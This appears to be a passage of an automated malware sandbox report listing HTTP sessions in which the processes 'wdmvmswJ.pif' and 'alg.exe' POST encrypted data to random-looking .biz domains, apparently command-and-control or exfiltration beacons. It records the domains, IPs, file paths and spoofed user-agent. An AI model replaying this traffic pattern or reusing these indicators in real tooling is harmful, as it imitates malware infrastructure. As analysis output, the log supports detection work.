98 | 192.168.2.8 | 49825 | 18.208.156.248 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:32.621440887 CET | 356 | OUT | POST /udqtfnpdyqh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:32.621464014 CET | 802 | OUT | Data Raw: 9c c3 db 99 3c ed 80 80 16 03 00 00 b8 f4 63 f7 23 d8 b4 cb 35 06 26 9b 99 02 54 8a 49 3d 71 d1 9b e3 dc 47 a9 b4 f8 37 c3 a8 21 2a bd 2f e0 13 e8 9f b3 ac 6f e2 70 eb db 27 30 a0 f7 e5 d0 d2 37 fe 4c be 2f 7d 6f 5d e4 e0 a8 25 d8 66 7a 51 a8 2e
Data Ascii: <c#5&TI=qG7!*/op'07L/}o]%fzQ.B42Mb ]zxN_|PU68*tlVK2OMR8> EcwF=^kv8Kv|x|`(a#D>}up%t}BW
Nov 1, 2024 08:24:33.283320904 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=427700877420d0be4aa2e428a282ac89|173.254.250.82|1730445873|1730445873|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.8 | 49826 | 34.211.97.45 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:33.134449959 CET | 350 | OUT | POST /kacads HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:33.134476900 CET | 778 | OUT | Data Raw: 50 b8 e7 50 a6 a5 93 3f fe 02 00 00 26 71 48 b2 17 3f 0a 74 db b1 89 0f 30 cc d8 5e 35 3b 1a de 30 59 b8 bd 46 11 c7 68 75 4d ed 0d 27 85 14 22 14 a9 39 66 cf 43 9f 43 de 99 4c 2f 44 7e 58 44 21 84 13 e5 10 a7 95 bc f9 9f 3c e9 d6 23 c4 a0 ad 13
Data Ascii: PP?&qH?t0^5;0YFhuM'"9fCCL/D~XD!<#zIC[/A|@F/2Q VSPB)5T}Bm)4H9eTV[r@l;ObG5pJ"\#DWTAW"()($+*PN?A.g'
Nov 1, 2024 08:24:33.968082905 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8e8931a29cd59927cc5d604c2e58c413|173.254.250.82|1730445873|1730445873|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
100         192.168.2.8  49827        13.251.16.150   80                4536  C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp  Bytes transferred  Direction  Data
Nov 1, 2024 08:24:33.357310057 CET  348  OUT  POST /nuyubw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: jdhhbs.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Nov 1, 2024 08:24:33.357337952 CET  802  OUT  Data Raw: 62 45 2d 2f a7 b6 5a 65 16 03 00 00 03 14 0c 86 6a 1a 5f 60 86 21 e6 93 de d7 8a 9b 65 68 5d b7 18 17 71 63 90 d9 af 78 bf ce e8 d5 5c f0 bf 3b 04 55 e5 3e ab b9 59 e4 77 55 6b 54 3f a5 ea e9 f2 ba df 8d 65 76 02 5f b5 d3 ba f6 3c 16 d6 59 4f 0e
    Data Ascii: bE-/Zej_`!eh]qcx\;U>YwUkT?ev_<YO1z)x_+Cqw6,^fd !GL{7@zn.Vjva|j%C[#{ygYQyUB~@ytv?X.":t};]rA9L=&"#
Nov 1, 2024 08:24:34.800206900 CET  414  IN  HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 07:24:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=29d8ead88d9578ef89faf29a4135fea4|173.254.250.82|1730445874|1730445874|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
101         192.168.2.8  49838        47.129.31.212   80                4916  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Nov 1, 2024 08:24:34.595730066 CET  344  OUT  POST /rn HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ftxlah.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 1, 2024 08:24:34.595746994 CET  778  OUT  Data Raw: be 5e 66 ca 97 f0 96 be fe 02 00 00 f8 39 a1 07 6f 90 c5 c3 9d d7 7d 3c ed a5 d6 cc b3 f3 ce 24 67 d9 04 60 fd 9f 09 1a b0 9b 28 2f 3c 63 17 e2 df 30 21 a2 d7 19 90 d8 a3 7a ff c3 f9 43 31 a6 3b d6 81 59 90 e1 8a 50 ce ce 00 43 a1 05 ac f5 9b f7
    Data Ascii: ^f9o}<$g`(/<c0!zC1;YPC'M:fZj\t'vOtmH"JCtD[O.Oz%.~7D#EX]wy1Kish)[y>q)a~a3U?Cq{D
Nov 1, 2024 08:24:36.279721975 CET  414  IN  HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 07:24:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b5d4539072af6c9db9c9e434a73b489f|173.254.250.82|1730445875|1730445875|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Nov 1, 2024 08:24:36.281236887 CET  414  IN  HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 07:24:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b5d4539072af6c9db9c9e434a73b489f|173.254.250.82|1730445875|1730445875|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
102         192.168.2.8  49839        34.246.200.160  80                4536  C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp  Bytes transferred  Direction  Data
Nov 1, 2024 08:24:34.849875927 CET  357  OUT  POST /enxhgeexxmda HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: mgmsclkyu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Nov 1, 2024 08:24:34.849893093 CET  802  OUT  Data Raw: 0e be a1 0e b4 6b fe 13 16 03 00 00 58 09 d5 08 04 34 eb 10 5b 3b 9e b1 76 c8 6f 3d d8 c0 57 39 26 c9 cb d5 72 ba b5 20 81 93 24 35 7d 7e 9d 09 25 1e 01 d8 1b 12 14 2f 90 f6 51 ea 0c 9d c4 08 81 cc 7f 43 40 80 33 d6 91 86 a8 b5 e3 df 47 97 85 d8
    Data Ascii: kX4[;vo=W9&r $5}~%/QC@3Gt"1#Jz\f5v*.[B\#_/`X0cMh+s3TS+u|n~@JkH2|RQ%u`^;`
Nov 1, 2024 08:24:35.818784952 CET  417  IN  HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 07:24:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2ea3fd1d48cc5153141794d950f14d4f|173.254.250.82|1730445875|1730445875|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.8 | 49845 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:35.866821051 CET | 346 | OUT | POST /pry HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:35.866883039 CET | 802 | OUT | Data Raw: 6f 9a 32 8f b9 65 13 63 16 03 00 00 fa e3 b9 01 56 b4 75 99 ea 0c ce 41 8b 96 24 20 0a e1 40 f9 b8 61 6b 8d 1a da 83 6d 50 d1 2e 50 6e d2 9e ff 04 33 89 75 7c c9 ff 41 08 08 6f 41 f9 9a be ba 4e 4e fa 69 51 3d 47 7d 6c 7f 59 27 71 73 e7 dd c9 7d
Data Ascii: o2ecVuA$ @akmP.Pn3u|AoANNiQ=G}lY'qs}Aw$9Uv4"oJ>P}/AEsN|[K<v{mO7j\(c/Cr4b%~'="yIEO*@jap&:2TBJ
Nov 1, 2024 08:24:37.935671091 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=143826c929e75164296f22a14a6f45c6|173.254.250.82|1730445877|1730445877|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Nov 1, 2024 08:24:37.937845945 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=143826c929e75164296f22a14a6f45c6|173.254.250.82|1730445877|1730445877|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.8 | 49851 | 13.251.16.150 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:36.442747116 CET | 347 | OUT | POST /xrcr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:36.443625927 CET | 778 | OUT | Data Raw: 26 09 5a 2c 55 2b 2a 55 fe 02 00 00 8a e2 20 cd 63 f1 90 aa 6d fb 02 99 79 22 3c f3 44 4b f5 f3 75 7f 8c 8f 4a 7a 96 ba 49 d6 00 a9 af a4 eb 3a 55 02 41 a0 4d c6 5c 39 08 fa 05 4a c0 22 83 be ff 64 05 fa 60 24 19 a6 64 b2 80 d7 ab 64 5f 0c 30 f3
Data Ascii: &Z,U+*U cmy"<DKuJzI:UAM\9J"d`$dd_0;GflpK?G;3R7NqX<)n>ALs<D_1q{;GA{Np}dYL~Iky_1WzI>!,BGb?t>]H+"J^Y4n/g
Nov 1, 2024 08:24:37.935823917 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=919dd2f3e3f826545690cc0a8d7cf35f|173.254.250.82|1730445877|1730445877|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        105192.168.2.84985713.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.993966103 CET343OUTPOST /nr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.993978024 CET802OUTData Raw: 5b cf ca c6 38 1f 5f b1 16 03 00 00 88 f0 26 2e 63 71 35 57 9f 1b af 49 e4 2d 8a 6d 29 18 b1 0e 7b 3a 03 01 3a 42 a5 5d dc b1 84 cc 1a 85 05 f4 70 91 b1 98 c8 31 f7 77 c4 a8 ae 6f 6f 4b 6d 5c 15 60 11 59 97 f5 fe 4c 87 20 2f 47 03 3b ff cc 2f ec
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [8_&.cq5WI-m){::B]p1wooKm\`YL /G;/";rHb;bK=qlT3)]v7e;w6:`6iB^rVEx=e:[`'_5Y4k\jf-R7D-d>a'3!?8o8*9iS
Nov 1, 2024 08:24:39.435184002 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d358cd36378377b6335a2ffc34b0189e|173.254.250.82|1730445879|1730445879|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.8 | 49860 | 34.211.97.45 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:38.137952089 CET | 344 | OUT | POST /uku HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.137967110 CET778OUTData Raw: 2b 88 53 7b dd db 63 72 fe 02 00 00 88 dd 5b e7 ed 6b d0 5e fe 21 c4 c1 ff 03 99 4e 41 bc d9 fc a5 a6 41 4b 0b ac e4 1d 2c cd ce 3d 5e db 12 ed 45 72 55 b8 e7 79 1b 4b 97 8b ee e3 7b 3e 0a 3f 2a 0a a6 9a 21 ee 43 e2 55 f4 00 9e 9f d4 ed 65 07 90
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +S{cr[k^!NAAK,=^ErUyK{>?*!CUeFsr&V690EfwE*`%PTq`_Av5Z3o\[{"AR$Fnpqc:<K2eB[E6c|%-u5cF^wfb
Nov 1, 2024 08:24:38.979274988 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=31ac332b4f32e9b7921263e30e9871e7|173.254.250.82|1730445878|1730445878|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.8 | 49868 | 3.94.10.34 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:39.173372030 CET | 350 | OUT | POST /sbnab HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.173398018 CET778OUTData Raw: 9a 7a 11 97 58 89 45 17 fe 02 00 00 83 df 21 5c 9a b5 43 21 06 ed 3a 91 37 c4 a7 61 79 77 d0 cb 5f 4c 55 92 02 df cf 57 b8 a0 92 d3 07 e0 66 d3 c5 21 bc 5c 8d 16 66 43 0d 41 d8 9e 40 e0 e0 b7 88 8d a1 7f 78 66 44 c3 9c 20 92 09 0b 75 85 8c c9 21
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zXE!\C!:7ayw_LUWf!\fCA@xfD u!$3#cCe-diTOnVNu$ed)zh"cfT*~9E9rC\3p5apK9tu`<\7C<m!Fg]1cRGj7SL
Nov 1, 2024 08:24:39.866695881 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=abd5c6b61624e0d3d131ad6d1006f6f8|173.254.250.82|1730445879|1730445879|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.8 | 49870 | 18.208.156.248 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:39.495888948 CET | 353 | OUT | POST /dvarulpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.495959997 CET802OUTData Raw: 16 51 5a 43 e8 8b dc 6d 16 03 00 00 04 5b f1 f8 32 06 b3 c3 76 aa f9 24 90 98 57 d3 d5 23 04 d7 00 1b 10 7d ab 8c 53 30 52 09 fc e2 8b f5 4b d5 04 de a4 93 83 0d 50 69 2f 98 9f 9f cb ec d8 ed b0 d8 f5 50 44 f0 18 7f 42 a3 11 e1 c8 3c 11 cb 00 0e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: QZCm[2v$W#}S0RKPi/PDB<'"l9[0Dpf|b=cr96erw"`,OadI}&d{=CT/o'tq'w5C>vnZ7-CCE+(a,|+0
Nov 1, 2024 08:24:40.171138048 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b7f48eda2e065505457d20d370d50afb|173.254.250.82|1730445880|1730445880|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
109         192.168.2.8  49875        18.246.231.120  80                4916  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:24:40.175878048 CET  354                OUT        POST /tfbvwglkixk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:40.175901890 CET  778                OUT        Data Raw: a7 d8 59 c7 17 0e 69 c7 fe 02 00 00 ec 63 de 10 8b 08 56 cf 32 ea 5e c7 22 aa 23 67 91 14 76 06 79 e8 59 f5 80 a6 dd 47 83 46 43 8e a3 23 0d 9d cf 13 ff 97 df bd dd 6b 0d 2c c4 fa 4c 62 91 ac 92 b9 c9 a5 bf c2 0a 09 6f 9d cf ae b8 7c 42 17 d9 30
Data Ascii: YicV2^"#gvyYGFC#k,Lbo|B06mHyLXM1y94G5<ZkCmL(,AsE^-Cj!MCSt4+xFktQ>0O3MOVQe/1DBd.Pq+6DQu\q
Nov 1, 2024 08:24:41.033015013 CET  415                IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9ba31ad66d9181fe8dbf6cc1fc087220|173.254.250.82|1730445880|1730445880|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
110         192.168.2.8  49877        18.246.231.120  80                4536  C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:24:40.235758066 CET  349                OUT        POST /noubyejh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:40.235780001 CET  802                OUT        Data Raw: 46 25 b3 be eb 26 1e 6c 16 03 00 00 3e 2f 2e b7 e2 e0 89 3d 4d 9e ee c9 d5 44 db 03 90 8b 6f ac a7 d9 4f b2 c1 80 21 34 6e 2c 23 97 3b b4 4c 16 81 6d de 36 c0 6c df 30 ff 42 e5 36 54 c5 40 d1 a7 44 32 96 8b 92 fa 69 95 30 d0 82 19 0c 9c 7a 2c b5
